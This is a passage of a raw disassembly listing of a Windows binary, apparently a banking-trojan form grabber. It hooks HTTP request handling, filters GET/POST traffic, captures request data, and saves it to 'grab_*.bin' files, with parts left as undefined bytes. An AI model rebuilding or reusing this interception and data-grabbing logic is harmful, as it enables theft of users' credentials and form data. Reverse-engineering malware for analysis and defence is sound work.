loc_40D17E: ; CODE XREF: sub_40D058+115�j
test byte ptr [edi+2], 10h
jz short loc_40D187
or dword ptr [esi], 8
loc_40D187: ; CODE XREF: sub_40D058+12A�j
test byte ptr [edi+2], 20h
jz short loc_40D190
or dword ptr [esi], 40h
loc_40D190: ; CODE XREF: sub_40D058+133�j
test byte ptr [edi+2], 40h
jz short loc_40D19C
or dword ptr [esi], 80h
loc_40D19C: ; CODE XREF: sub_40D058+13C�j
test byte ptr [edi+2], 80h
jz short loc_40D1A8
or dword ptr [esi], 100h
loc_40D1A8: ; CODE XREF: sub_40D058+148�j
mov eax, dword_40FB34
push 80000000h
push 0FFFFFFFFh
push dword ptr [eax+184h]
mov eax, [ebp+arg_4]
push dword ptr [eax+420h]
call dword_40FB78
xor esi, esi
inc esi
loc_40D1CC: ; CODE XREF: sub_40D058+A0�j
; sub_40D058+BB�j
mov eax, esi
pop ebx
loc_40D1CF: ; CODE XREF: sub_40D058+70�j
pop edi
pop esi
leave
retn 0Ch
sub_40D058 endp
; =============== S U B R O U T I N E =======================================
sub_40D1D5 proc near ; DATA XREF: .text:0040D250�o
; sub_41E71F+57�o
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp [esp+arg_8], 64h
jnz short locret_40D1F6
mov eax, [esp+arg_4]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_40D1F0
push dword ptr [eax+3Ch]
call dword_40FDBC ; SetEvent
jmp short locret_40D1F6
; ---------------------------------------------------------------------------
loc_40D1F0: ; CODE XREF: sub_40D1D5+E�j
push eax
call loc_40D1F9
locret_40D1F6: ; CODE XREF: sub_40D1D5+5�j
; sub_40D1D5+19�j
retn 14h
sub_40D1D5 endp
; ---------------------------------------------------------------------------
loc_40D1F9: ; CODE XREF: sub_40D1D5+1C�p
push ebp
lea ebp, [esp-74h]
sub esp, 3B8h
mov eax, [ebp+7Ch]
mov eax, [eax]
push ebx
push esi
xor ebx, ebx
push edi
inc ebx
xor edi, edi
cmp eax, edi
mov [ebp+5Ch], ebx
jz short loc_40D21D
cmp eax, 0FFFFFFFFh
jnz short loc_40D293
loc_40D21D: ; CODE XREF: .text:0040D216�j
push 1000h
call sub_4092F9
pop ecx
mov ecx, [ebp+7Ch]
mov [ecx+48h], eax
mov eax, [ebp+7Ch]
cmp [eax+48h], edi
jnz short loc_40D23D
loc_40D236: ; CODE XREF: .text:0040D2EC�j
xor eax, eax
jmp near ptr 40D84Dh
; ---------------------------------------------------------------------------
loc_40D23D: ; CODE XREF: .text:0040D234�j
push edi
push edi
push ebx
push edi
call dword_40FDC4 ; CreateEventW
mov ecx, [ebp+7Ch]
mov [ecx+3Ch], eax
mov eax, [ebp+7Ch]
push offset sub_40D1D5
push dword ptr [eax+8]
call dword_40FB88
mov ecx, [ebp+7Ch]
push 4
mov [ecx+40h], eax
pop esi
lea eax, [ebp+60h]
push eax
mov eax, [ebp+7Ch]
lea ecx, [eax+44h]
push ecx
push 2Dh
mov [ebp+60h], esi
push dword ptr [eax+8]
call dword_40FB64
push esi
lea eax, [ebp+7Ch]
push eax
mov eax, [ebp+7Ch]
push 2Dh
push dword ptr [eax+8]
call dword_40FB8C
loc_40D293: ; CODE XREF: .text:0040D21B�j
push 28h
pop esi
lea eax, [ebp+20h]
push esi
push eax
call sub_40A94C
mov eax, [ebp+7Ch]
mov [ebp+20h], esi
mov eax, [eax+48h]
pop ecx
pop ecx
mov [ebp+34h], eax
loc_40D2AE: ; CODE XREF: .text:0040D333�j
; .text:0040D37F�j
mov eax, [ebp+7Ch]
push eax
push 8
pop esi
push esi
lea ecx, [ebp+20h]
push ecx
mov dword ptr [ebp+38h], 1000h
push dword ptr [eax+8]
call dword_40FB84
test eax, eax
jnz short loc_40D338
call dword_40FD78 ; RtlGetLastWin32Error
cmp eax, 3E5h
mov [ebp+60h], eax
jnz loc_40D387
mov eax, [ebp+7Ch]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_40D2FB
inc dword ptr [eax]
jmp loc_40D236
; ---------------------------------------------------------------------------
loc_40D2F1: ; CODE XREF: .text:0040D30B�j
lea eax, [ebp+4]
push eax
call dword_40FAF8
loc_40D2FB: ; CODE XREF: .text:0040D2E8�j
; .text:0040D325�j
push ebx
push edi
push edi
push edi
lea eax, [ebp+4]
push eax
call dword_40FAD4
test eax, eax
jnz short loc_40D2F1
mov eax, [ebp+7Ch]
push 0BFh
push 0FFFFFFFFh
push edi
add eax, 3Ch
push eax
push ebx
call dword_40FAF4
test eax, eax
jnz short loc_40D2FB
mov eax, [ebp+7Ch]
push dword ptr [eax+3Ch]
call dword_40FD50 ; ResetEvent
jmp loc_40D2AE
; ---------------------------------------------------------------------------
loc_40D338: ; CODE XREF: .text:0040D2CC�j
cmp [ebp+38h], edi
mov [ebp+60h], edi
jz short loc_40D38A
mov eax, [ebp+7Ch]
mov ecx, [eax+1Ch]
add ecx, [ebp+38h]
push ecx
push dword ptr [eax+18h]
call sub_40A91F
cmp eax, edi
pop ecx
pop ecx
jz short loc_40D384
mov ecx, [ebp+7Ch]
mov [ecx+18h], eax
mov eax, [ebp+7Ch]
push dword ptr [ebp+38h]
mov ecx, [eax+1Ch]
push dword ptr [eax+48h]
add ecx, [eax+18h]
push ecx
call sub_409331
mov eax, [ebp+7Ch]
mov ecx, [ebp+38h]
add esp, 0Ch
add [eax+1Ch], ecx
jmp loc_40D2AE
; ---------------------------------------------------------------------------
loc_40D384: ; CODE XREF: .text:0040D356�j
mov [ebp+60h], esi
loc_40D387: ; CODE XREF: .text:0040D2DC�j
mov [ebp+5Ch], edi
loc_40D38A: ; CODE XREF: .text:0040D33E�j
mov eax, [ebp+7Ch]
push 4
lea ecx, [eax+44h]
push ecx
push 2Dh
push dword ptr [eax+8]
call dword_40FB8C
mov eax, [ebp+7Ch]
cmp dword ptr [eax+40h], 0FFFFFFFFh
jnz short loc_40D3AB
xor ecx, ecx
jmp short loc_40D3AE
; ---------------------------------------------------------------------------
loc_40D3AB: ; CODE XREF: .text:0040D3A5�j
mov ecx, [eax+40h]
loc_40D3AE: ; CODE XREF: .text:0040D3A9�j
push ecx
push dword ptr [eax+8]
call dword_40FB88
mov eax, [ebp+7Ch]
push dword ptr [eax+3Ch]
call dword_40FDAC ; CloseHandle
cmp [ebp+5Ch], edi
jz near ptr byte_40D7B0
mov eax, [ebp+7Ch]
cmp [eax+34h], edi
jz short loc_40D40D
mov ecx, [eax+34h]
cmp byte ptr [ecx], 2Ah
jnz short loc_40D3E3
cmp byte ptr [ecx+1], 0
jz short loc_40D40D
loc_40D3E3: ; CODE XREF: .text:0040D3DB�j
push esi
push edi
push edi
push dword ptr [eax+1Ch]
push dword ptr [eax+18h]
push ecx
call dword_40FD94 ; lstrlenA
push eax
mov eax, [ebp+7Ch]
push dword ptr [eax+34h]
call sub_408CFB
add esp, 1Ch
test al, al
jz near ptr byte_40D7B0
mov eax, [ebp+7Ch]
loc_40D40D: ; CODE XREF: .text:0040D3D3�j
; .text:0040D3E1�j
mov [ebp+6Ch], edi
mov ecx, [eax+24h]
mov edx, [eax+28h]
add edx, ecx
cmp ecx, edx
mov [ebp+58h], edi
mov [ebp+54h], edx
jnb loc_40D618
jmp short loc_40D42B
; ---------------------------------------------------------------------------
loc_40D428: ; CODE XREF: .text:0040D60D�j
mov eax, [ebp+7Ch]
loc_40D42B: ; CODE XREF: .text:0040D426�j
movzx esi, word ptr [ecx]
add esi, ecx
movzx edi, word ptr [esi]
add edi, esi
cmp esi, edi
mov [ebp+64h], edi
jnb loc_40D616
cmp edi, edx
jnb loc_40D616
xor ebx, ebx
or edx, 0FFFFFFFFh
mov [ebp+70h], ebx
mov [ebp+68h], edx
cmp [ecx+4], bx
jz short loc_40D489
movzx edx, word ptr [ecx+4]
push 0Bh
push ebx
lea ebx, [ebp+70h]
push ebx
push dword ptr [eax+1Ch]
push dword ptr [eax+18h]
movzx eax, word ptr [ecx]
sub eax, edx
push eax
add edx, ecx
push edx
call sub_408CFB
add esp, 1Ch
test al, al
jz loc_40D603
mov eax, [ebp+7Ch]
mov edx, [ebp+68h]
loc_40D489: ; CODE XREF: .text:0040D457�j
cmp word ptr [esi+4], 0
jz short loc_40D4C9
movzx ecx, word ptr [esi+4]
push 0Bh
lea edx, [ebp+68h]
push edx
mov edx, [eax+1Ch]
mov eax, [eax+18h]
sub edx, [ebp+70h]
add eax, [ebp+70h]
push 0
push edx
push eax
movzx eax, word ptr [esi]
sub eax, ecx
push eax
add ecx, esi
push ecx
call sub_408CFB
add esp, 1Ch
test al, al
jz loc_40D603
mov eax, [ebp+7Ch]
mov edx, [ebp+68h]
loc_40D4C9: ; CODE XREF: .text:0040D48E�j
movzx ecx, word ptr [edi+4]
test cx, cx
jz short loc_40D4DC
movzx ebx, word ptr [edi]
movzx ecx, cx
sub ebx, ecx
jmp short loc_40D4DE
; ---------------------------------------------------------------------------
loc_40D4DC: ; CODE XREF: .text:0040D4D0�j
xor ebx, ebx
loc_40D4DE: ; CODE XREF: .text:0040D4DA�j
cmp word ptr [esi+4], 0
jnz short loc_40D4EA
xor edx, edx
mov [ebp+68h], edx
loc_40D4EA: ; CODE XREF: .text:0040D4E3�j
test byte ptr [eax+4], 8
jz loc_40D58A
test edx, edx
jnz short loc_40D501
mov edx, [eax+1Ch]
sub edx, [ebp+70h]
mov [ebp+68h], edx
loc_40D501: ; CODE XREF: .text:0040D4F6�j
mov ecx, [ebp+58h]
lea eax, [ebx+edx]
lea eax, [eax+ecx+4]
push eax
lea eax, [ebp+6Ch]
push eax
call sub_40B3C4
test al, al
pop ecx
pop ecx
jz loc_40D613
movzx eax, word ptr [edi+4]
test ax, ax
mov esi, [ebp+58h]
jbe short loc_40D542
movzx eax, ax
add eax, edi
push ebx
push eax
mov eax, [ebp+6Ch]
add eax, esi
push eax
call sub_409331
add esp, 0Ch
add esi, ebx
loc_40D542: ; CODE XREF: .text:0040D529�j
mov eax, [ebp+7Ch]
mov eax, [eax+18h]
add eax, [ebp+70h]
push dword ptr [ebp+68h]
push eax
mov eax, [ebp+6Ch]
add eax, esi
push eax
call sub_409331
mov eax, [ebp+7Ch]
add esp, 0Ch
test byte ptr [eax+4], 80h
jz short loc_40D56B
add esi, [ebp+68h]
jmp short loc_40D57D
; ---------------------------------------------------------------------------
loc_40D56B: ; CODE XREF: .text:0040D564�j
mov eax, [ebp+6Ch]
push dword ptr [ebp+68h]
add eax, esi
push eax
call sub_409123
pop ecx
pop ecx
add esi, eax
loc_40D57D: ; CODE XREF: .text:0040D569�j
mov eax, [ebp+6Ch]
mov byte ptr [esi+eax], 0Ah
inc esi
mov [ebp+58h], esi
jmp short loc_40D603
; ---------------------------------------------------------------------------
loc_40D58A: ; CODE XREF: .text:0040D4EE�j
mov edi, [eax+1Ch]
sub edi, edx
add edi, ebx
push edi
call sub_4092F9
mov esi, eax
test esi, esi
pop ecx
jz short loc_40D600
push dword ptr [ebp+70h]
mov eax, [ebp+7Ch]
push dword ptr [eax+18h]
push esi
call sub_409331
mov eax, [ebp+64h]
movzx ecx, word ptr [eax+4]
add ecx, eax
mov eax, [ebp+70h]
push ebx
push ecx
add eax, esi
push eax
call sub_409331
mov eax, [ebp+7Ch]
mov ecx, [eax+1Ch]
mov eax, [eax+18h]
sub ecx, [ebp+68h]
add eax, [ebp+68h]
sub ecx, [ebp+70h]
add eax, [ebp+70h]
push ecx
push eax
lea eax, [esi+ebx]
add eax, [ebp+70h]
push eax
call sub_409331
mov eax, [ebp+7Ch]
push dword ptr [eax+18h]
call sub_409317
mov eax, [ebp+7Ch]
mov [eax+18h], esi
mov eax, [ebp+7Ch]
add esp, 28h
mov [eax+1Ch], edi
loc_40D600: ; CODE XREF: .text:0040D59C�j
mov edi, [ebp+64h]
loc_40D603: ; CODE XREF: .text:0040D47D�j
; .text:0040D4BD�j ...
movzx ecx, word ptr [edi]
mov edx, [ebp+54h]
add ecx, edi
cmp ecx, edx
jb loc_40D428
loc_40D613: ; CODE XREF: .text:0040D519�j
mov eax, [ebp+7Ch]
loc_40D616: ; CODE XREF: .text:0040D43A�j
; .text:0040D442�j
xor edi, edi
loc_40D618: ; CODE XREF: .text:0040D420�j
test byte ptr [eax+4], 8
jz loc_40D71E
cmp [ebp+6Ch], edi
jz loc_40D71E
lea ecx, [ebp+64h]
push ecx
mov dword ptr [ebp+64h], 0FFFh
push dword ptr [eax+48h]
push 22h
push dword ptr [eax+8]
call dword_40FB64
test eax, eax
jnz short loc_40D654
mov eax, [ebp+7Ch]
mov [ebp+64h], edi
mov eax, [eax+48h]
mov byte ptr [eax], 0
loc_40D654: ; CODE XREF: .text:0040D646�j
mov eax, [ebp+6Ch]
mov ebx, [ebp+58h]
mov byte ptr [ebx+eax], 0
mov eax, [ebp+7Ch]
test byte ptr [eax+4], 40h
jz loc_40D6EF
push 3Ch
pop esi
lea eax, [ebp-38h]
push esi
push eax
call sub_40A94C
pop ecx
pop ecx
lea eax, [ebp-13Ch]
mov [ebp-28h], eax
lea eax, [ebp-38h]
push eax
mov eax, [ebp+7Ch]
push edi
push dword ptr [ebp+64h]
mov [ebp-38h], esi
mov esi, 103h
mov [ebp-24h], esi
push dword ptr [eax+48h]
call dword_40FB58
lea eax, [ebp+48h]
push eax
call dword_40FE8C ; GetSystemTime
movzx eax, word ptr [ebp+4Eh]
push eax
movzx eax, word ptr [ebp+4Ah]
push eax
movzx eax, word ptr [ebp+48h]
sub eax, 7D0h
push eax
lea eax, [ebp-13Ch]
push eax
push offset aGrab_S_02u_02u ; "grab_%S_%02u_%02u_%02u.bin"
lea eax, [ebp-344h]
push esi
push eax
call dword_40FC84
push ebx
push dword ptr [ebp+6Ch]
lea eax, [ebp-344h]
push eax
call sub_40B850
add esp, 28h
jmp short loc_40D712
; ---------------------------------------------------------------------------
loc_40D6EF: ; CODE XREF: .text:0040D665�j
push dword ptr [ebp+6Ch]
push dword ptr [eax+48h]
mov eax, [ebp+64h]
lea eax, [eax+ebx+1Eh]
push eax
mov eax, dword_40FB34
push dword ptr [eax+188h]
push 5
call sub_40B583
add esp, 14h
loc_40D712: ; CODE XREF: .text:0040D6ED�j
push dword ptr [ebp+6Ch]
call sub_409317
mov eax, [ebp+7Ch]
pop ecx
loc_40D71E: ; CODE XREF: .text:0040D61C�j
; .text:0040D625�j
cmp [eax+2Ch], edi
jz short loc_40D76B
mov ecx, [eax+2Ch]
cmp byte ptr [ecx], 0
jz short loc_40D76B
push dword_4102F0
call sub_409317
push dword_4102F4
call sub_409317
mov eax, [ebp+7Ch]
push 0FFFFFFFFh
push dword ptr [eax+2Ch]
call sub_40A747
mov dword_4102F0, eax
mov eax, [ebp+7Ch]
push 0FFFFFFFFh
push dword ptr [eax+30h]
call sub_40A747
mov dword_4102F4, eax
mov eax, [ebp+7Ch]
add esp, 18h
loc_40D76B: ; CODE XREF: .text:0040D721�j
; .text:0040D729�j
test word ptr [eax+4], 100h
jz short near ptr byte_40D7B3
; ---------------------------------------------------------------------------
db ?
dd 2 dup(?)
db ?
dd ?
db 3 dup(?)
dd 5 dup(?)
db 2 dup(?)
dd ?
dw ?
dd 4 dup(?)
byte_40D7B0 db 3 dup(?) ; CODE XREF: .text:0040D3C7�j
; .text:0040D404�j
byte_40D7B3 db ? ; CODE XREF: .text:0040D771�j
dd 4 dup(?)
dd ?
db 3 dup(?)
dd ?
db ?
dd 6 dup(?)
dd ?
dd 5 dup(?)
_text ends
; Section 2. (virtual address 0000E000)
; Virtual size : 00013AE3 ( 80611.)
; Section size in file : 00013AE3 ( 80611.)
; Offset to raw data for section: 0000E000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 40E000h
dd 6A026AF8h, 0FF006A00h, 400B6h, 0FF575600h
db 15h
dd offset dword_40FD94
db 50h, 57h, 0E8h
dd 0FFFFACDFh, 841CC483h, 6A1275C0h, 0A9E85701h, 8BFFFFACh
dd 59FF85F8h, 0EBAE7559h, 80C03366h, 950F01FBh, 2FB80C0h
dd 89C0B70Fh, 5375EC45h, 8D5F3C6Ah, 5057AC45h, 0FFC8F7E8h
dd 8D5959FFh, 0FFFEA885h, 0BC4589FFh, 50AC458Dh, 0B6FF006Ah
dd 400h, 56AC7D89h, 3C045C7h, 0FF000001h
db 15h
dd offset dword_40FB58
db 85h, 0C0h, 74h
dd 0C07D830Eh, 8D087400h, 0FFFEA885h, 3302EBFFh, 146A50C0h
dd 0FF651FE8h, 0FF5959FFh, 74E8F075h, 33FFFFB2h, 5D3966DBh
dd 97559ECh, 0CFE9C032h, 33000001h, 1C868BDBh, 3D000004h
dd 0EA60h, 8366EA77h, 75FFEC7Dh, 4BE8053h, 50000004h, 0F883DA75h
dd 53D57205h, 50F8458Dh, 50B4458Dh, 168h, 20B6FF80h, 0C7000004h
dd 31F845h, 15FF0000h
dd offset dword_40FB60
dd 0B074C085h
db 0A1h
dd offset dword_40FB34
db 6Ah, 2 dup(0FFh)
dd 0B0FFF875h, 13Ch, 50B4458Dh, 0FFAE58E8h, 10C483FFh
dd 9075C085h, 41C868Bh, 0FF330000h, 5F76C33Bh, 0CAE85040h
dd 8BFFFFB1h, 59FB3BF8h, 0FF72840Fh, 0B6FFFFFFh, 41Ch
dd 418B6FFh, 0E8570000h, 0FFFFB1E5h, 41C868Bh, 0C4830000h
dd 704C60Ch, 39D23300h, 41C9Eh, 33247600h, 8AC703C0h, 26F98008h
dd 0C60575h, 8008EB0Ah, 3752BF9h, 422000C6h, 3BC2B70Fh
dd 41C86h, 80DE7200h, 8973047Eh, 5D89E85Dh, 801075F4h
dd 753A057Eh, 67E800Ah, 0FF45C62Fh, 0C6047402h, 8D01FF45h
dd 8D50E845h, 0E850F445h, 0FFFF662Ah, 2FF7D80h, 25755959h
db 68h
dd offset dword_4102F8
db 0FFh, 15h
dd offset dword_40FE84
db 8Dh
dd 5650F445h, 0E8E85D8Dh, 0FFFFE5ABh
db 2 dup(59h), 68h
dd offset dword_4102F8
db 0FFh
db 15h
dd offset dword_40FE88
db 6Ah, 0, 8Dh
dd 8D50F845h, 0FFFAA885h, 236850FFh, 0FF800000h, 420B6h
dd 0F845C700h, 3FFh
db 0FFh, 15h
dd offset dword_40FB60
dw 0C085h
dd 458B0774h, 75C085F8h, 40C0330Dh, 0C6F84589h, 0FFFAA885h
dd 0FF852DFFh, 0A80584C6h, 0FFFFFAh
db 0B9h
dd offset byte_40325E
db 8Bh, 0D7h, 75h
dd 83D18B02h, 7400F47Dh, 0F44D8B03h, 8D8D5152h, 0FFFFFAA8h
dd 8E8B51h, 3000004h, 41C8Eh, 4D035600h, 1448DE8h
db 3Ch, 50h, 0A1h
dd offset dword_40FB34
db 0FFh
dd 140B0h, 45B60F00h, 14E850FFh, 0FFFFFFD3h, 0A0E8F475h
dd 57FFFFB0h, 0FFB09AE8h, 24C483FFh, 5B5F01B0h
db 0C9h, 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E286 proc near ; CODE XREF: sub_40E45F+44�p
; sub_40E521+5A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, eax
lea edi, [esi+400h]
push edi
push esi
push 22h
push [ebp+arg_0]
mov dword ptr [edi], 3FCh
call dword_40FB64
test eax, eax
jz loc_40E458
mov eax, [edi]
cmp eax, 8
jbe loc_40E458
mov ebx, offset dword_4102F8
push ebx
mov byte ptr [eax+esi], 0
call dword_40FE84 ; RtlEnterCriticalSection
push dword ptr [edi]
push esi
call sub_40CD45
pop ecx
pop ecx
push ebx
call dword_40FE88 ; RtlLeaveCriticalSection
push 0
lea eax, [esi+410h]
push eax
lea ecx, [esi+404h]
push ecx
push 2Dh
push [ebp+arg_0]
mov dword ptr [eax], 9
call dword_40FB60
test eax, eax
jz loc_40E458
mov al, [esi+404h]
cmp al, 47h
jz short loc_40E316
cmp al, 50h
jnz loc_40E458
loc_40E316: ; CODE XREF: sub_40E286+86�j
push 1
push esi
push offset a@hj01n_1@ ; "-!-@hj01N./1@};|"
call sub_40B154
add esp, 0Ch
test al, al
jz short loc_40E343
or dword ptr [esi+424h], 4
push 2F78h
call dword_40FE78 ; RtlSetLastWin32Error
loc_40E33C: ; CODE XREF: sub_40E286+165�j
; sub_40E286+1CD�j
mov al, 1
jmp loc_40E45A
; ---------------------------------------------------------------------------
loc_40E343: ; CODE XREF: sub_40E286+A2�j
push 0
push 0
call sub_4034E8
mov [esi+414h], al
mov eax, [ebp+arg_0]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [esi+420h], eax
xor eax, eax
cmp ecx, eax
mov [esi+42Ch], eax
mov [esi+428h], eax
jz short loc_40E387
mov edx, [ebp+arg_4]
cmp edx, eax
jz short loc_40E387
mov [esi+41Ch], ecx
mov [esi+418h], edx
jmp short loc_40E393
; ---------------------------------------------------------------------------
loc_40E387: ; CODE XREF: sub_40E286+EA�j
; sub_40E286+F1�j
mov [esi+41Ch], eax
mov [esi+418h], eax
loc_40E393: ; CODE XREF: sub_40E286+FF�j
call near ptr 40DF90h
xor eax, eax
push eax
push eax
push eax
push dword ptr [edi]
mov eax, dword_40FB34
push esi
push dword ptr [eax+170h]
call dword_40FD94 ; lstrlenA
push eax
mov eax, dword_40FB34
push dword ptr [eax+170h]
call sub_408CFB
add esp, 1Ch
test al, al
jz short loc_40E3E4
push dword ptr [edi]
push esi
call sub_40A747
test eax, eax
pop ecx
pop ecx
jz short loc_40E3E4
push eax
push offset loc_40C2C0
call sub_40A263
pop ecx
pop ecx
loc_40E3E4: ; CODE XREF: sub_40E286+141�j
; sub_40E286+14F�j
cmp byte ptr [esi+414h], 0
jz loc_40E33C
push ebx
call dword_40FE84 ; RtlEnterCriticalSection
push 40DC2Bh
push 0
push 0Ah
push 8
push 4
push 2
push 0Eh
push 3EFh
call sub_40CBC4
add esp, 20h
test al, al
jz short loc_40E423
or dword ptr [esi+424h], 2
jmp short loc_40E447
; ---------------------------------------------------------------------------
loc_40E423: ; CODE XREF: sub_40E286+192�j
push offset sub_40D058
push 0
push 8
push 6
push 4
push 2
push 0Eh
push 4B6h
call sub_40CBC4
push esi
call sub_40CE51
add esp, 24h
loc_40E447: ; CODE XREF: sub_40E286+19B�j
push ebx
call dword_40FE88 ; RtlLeaveCriticalSection
call sub_4035AD
jmp loc_40E33C
; ---------------------------------------------------------------------------
loc_40E458: ; CODE XREF: sub_40E286+23�j
; sub_40E286+2E�j ...
xor al, al
loc_40E45A: ; CODE XREF: sub_40E286+B8�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40E286 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E45F proc near ; CODE XREF: .data:0040E4F5�p
; .data:0040E515�p
var_434 = byte ptr -434h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 434h
push ebx
push esi
xor ebx, ebx
cmp [ebp+arg_C], ebx
push edi
mov edi, eax
mov esi, ecx
jz short loc_40E495
cmp [ebp+arg_0], bl
mov eax, dword_40FB74
jnz short loc_40E485
mov eax, dword_40FB78
loc_40E485: ; CODE XREF: sub_40E45F+1F�j
push 0A0000000h
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call eax ; dword_40FB74
loc_40E495: ; CODE XREF: sub_40E45F+15�j
push edi
push esi
push [ebp+arg_4]
lea eax, [ebp+var_434]
mov [ebp+var_10], ebx
call sub_40E286
add esp, 0Ch
test al, al
jz short loc_40E4CF
test byte ptr [ebp+var_10], 4
jz short loc_40E4B9
xor eax, eax
jmp short loc_40E4DC
; ---------------------------------------------------------------------------
loc_40E4B9: ; CODE XREF: sub_40E45F+54�j
test byte ptr [ebp+var_10], 2
jz short loc_40E4C4
xor eax, eax
inc eax
jmp short loc_40E4DC
; ---------------------------------------------------------------------------
loc_40E4C4: ; CODE XREF: sub_40E45F+5E�j
cmp [ebp+var_8], ebx
jz short loc_40E4CF
mov esi, [ebp+var_C]
mov edi, [ebp+var_8]
loc_40E4CF: ; CODE XREF: sub_40E45F+4E�j
; sub_40E45F+68�j
push edi
push esi
push ebx
push ebx
push [ebp+arg_4]
call dword_40FB50
loc_40E4DC: ; CODE XREF: sub_40E45F+58�j
; sub_40E45F+63�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E45F endp
; ---------------------------------------------------------------------------
loc_40E4E1: ; DATA XREF: .data:0040F070�o
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
mov eax, [ebp+18h]
push dword ptr [ebp+0Ch]
mov ecx, [ebp+14h]
push dword ptr [ebp+8]
push 1
call sub_40E45F
add esp, 10h
pop ebp
retn 14h
; ---------------------------------------------------------------------------
loc_40E501: ; DATA XREF: .data:0040F084�o
push ebp
mov ebp, esp
push dword ptr [ebp+10h]
mov eax, [ebp+18h]
push dword ptr [ebp+0Ch]
mov ecx, [ebp+14h]
push dword ptr [ebp+8]
push 0
call sub_40E45F
add esp, 10h
pop ebp
retn 14h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E521 proc near ; CODE XREF: .data:0040E5DD�p
; .data:0040E5FA�p
var_434 = byte ptr -434h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 434h
push esi
mov esi, eax
xor eax, eax
xor ecx, ecx
test esi, esi
jz short loc_40E566
mov edx, [esi+0Ch]
test edx, edx
jz short loc_40E560
mov eax, [esi+8]
test eax, eax
jz short loc_40E560
cmp [ebp+arg_0], cl
mov ecx, dword_40FB74
jnz short loc_40E554
mov ecx, dword_40FB78
loc_40E554: ; CODE XREF: sub_40E521+2B�j
push 0A0000000h
push edx
push eax
push [ebp+arg_4]
call ecx ; dword_40FB74
loc_40E560: ; CODE XREF: sub_40E521+19�j
; sub_40E521+20�j
mov eax, [esi+14h]
mov ecx, [esi+18h]
loc_40E566: ; CODE XREF: sub_40E521+12�j
push ecx
push eax
push [ebp+arg_4]
lea eax, [ebp+var_434]
mov [ebp+var_10], 1
mov [ebp+var_4], esi
call sub_40E286
add esp, 0Ch
test al, al
jz short loc_40E5A5
test byte ptr [ebp+var_10], 4
jz short loc_40E591
xor eax, eax
jmp short loc_40E5C4
; ---------------------------------------------------------------------------
loc_40E591: ; CODE XREF: sub_40E521+6A�j
test byte ptr [ebp+var_10], 2
jz short loc_40E59C
xor eax, eax
inc eax
jmp short loc_40E5C4
; ---------------------------------------------------------------------------
loc_40E59C: ; CODE XREF: sub_40E521+74�j
cmp [ebp+var_8], 28h
jnz short loc_40E5A5
mov esi, [ebp+var_C]
loc_40E5A5: ; CODE XREF: sub_40E521+64�j
; sub_40E521+7F�j
cmp [ebp+arg_0], 0
mov eax, dword_40FB6C
jnz short loc_40E5B5
mov eax, dword_40FB70
loc_40E5B5: ; CODE XREF: sub_40E521+8D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push esi
push [ebp+arg_4]
call eax ; dword_40FB6C
loc_40E5C4: ; CODE XREF: sub_40E521+6E�j
; sub_40E521+79�j
pop esi
leave
retn 14h
sub_40E521 endp
; ---------------------------------------------------------------------------
loc_40E5C9: ; DATA XREF: .data:0040F098�o
push ebp
mov ebp, esp
push dword ptr [ebp+18h]
mov eax, [ebp+0Ch]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push 1
call sub_40E521
pop ebp
retn 14h
; ---------------------------------------------------------------------------
loc_40E5E6: ; DATA XREF: .data:0040F0AC�o
push ebp
mov ebp, esp
push dword ptr [ebp+18h]
mov eax, [ebp+0Ch]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push 0
call sub_40E521
pop ebp
retn 14h
; =============== S U B R O U T I N E =======================================
sub_40E603 proc near ; CODE XREF: sub_404222+A8�p
and dword_41032C, 0
and dword_410328, 0
push offset dword_410310
call dword_40FE80 ; InitializeCriticalSection
retn
sub_40E603 endp
; =============== S U B R O U T I N E =======================================
sub_40E61D proc near ; CODE XREF: sub_40E758+D9�p
; sub_40E758+119�p ...
arg_0 = dword ptr 4
mov edx, dword_410328
push esi
xor eax, eax
test edx, edx
push edi
jbe short loc_40E647
mov edi, dword_41032C
mov esi, edi
loc_40E633: ; CODE XREF: sub_40E61D+28�j
mov ecx, [esi]
cmp ecx, [esp+8+arg_0]
jnz short loc_40E63F
test ecx, ecx
jnz short loc_40E64C
loc_40E63F: ; CODE XREF: sub_40E61D+1C�j
inc eax
add esi, 0Ch
cmp eax, edx
jb short loc_40E633
loc_40E647: ; CODE XREF: sub_40E61D+C�j
xor eax, eax
loc_40E649: ; CODE XREF: sub_40E61D+34�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40E64C: ; CODE XREF: sub_40E61D+20�j
imul eax, 0Ch
add eax, edi
jmp short loc_40E649
sub_40E61D endp
; =============== S U B R O U T I N E =======================================
sub_40E653 proc near ; CODE XREF: sub_40E758+E8�p
arg_0 = dword ptr 4
mov ecx, dword_410328
mov edx, dword_41032C
xor eax, eax
test ecx, ecx
push esi
jbe short loc_40E67E
mov esi, edx
loc_40E668: ; CODE XREF: sub_40E653+20�j
cmp dword ptr [esi], 0
jz short loc_40E677
inc eax
add esi, 0Ch
cmp eax, ecx
